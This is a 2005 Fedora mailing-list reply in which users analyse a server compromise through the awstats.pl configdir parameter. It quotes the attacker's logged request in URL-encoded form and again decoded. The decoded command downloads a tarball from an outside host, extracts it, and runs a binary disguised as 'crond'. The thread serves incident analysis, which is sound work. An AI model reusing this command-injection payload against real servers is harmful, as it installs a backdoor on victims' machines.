Re: Security Breach

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
> David Cary Hart wrote:
> > On Fri, 2005-03-04 at 18:34 +0100, Alexander Dalloz wrote:
> > 
> >>>  "GET  
> >>>/cgi-bin/awstats.pl? 
> >>>configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%2 
> >>>0zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2eta 
> >>>r%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3bec 
> >>>ho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"
> 
> (snip)
> 
> >>Thank you for this report.
> >>So you are saying that even with awstats 6.4 you got compromised as
> >>Apache did execute the logged command and a trojan then started running
> >>located in /tmp? If so, would you please be so kind and report that
> >>issue to the awstats project guys as soon as possible?
> > 
> > 
> > Alexander:
> > 
> > Could you explain the series of events? It's not clear - to me - how
> > this resulted in a compromised machine.
> 
> Replace the url-encoded characters and you get:
> 
> /cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget 
> zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv 
> mech crond;export PATH=;crond;echo e_exp;%00
> 
> So the attacker has tricked the script into executing a set of shell 
> commands, which include changing directory to /tmp, downloading a 
> tarball from a Romanian site, extracting that tarball and then executing 
> a program from the downloaded and extracted tarball, after renaming it 
> to "crond" in an effort to disguise it.

I got that part. What I am trying to understand (please bear with me) is
how the attacker might have modified the script command line.
-- 
Total Quality Management - A Commitment to Excellence
Fight Spam: http://www.tqmcube.com/rbldnsd.htm
Daily Updates: rsync -t \
tqmcube.com::spamlists/[README.htm][clients][dynamic][relays][asiaspam]
http://www.tqmcube.com/spam_trap.htm
                


[Index of Archives]     [Current Fedora Users]     [Fedora Desktop]     [Fedora SELinux]     [Yosemite News]     [Yosemite Photos]     [KDE Users]     [Fedora Tools]     [Fedora Docs]

  Powered by Linux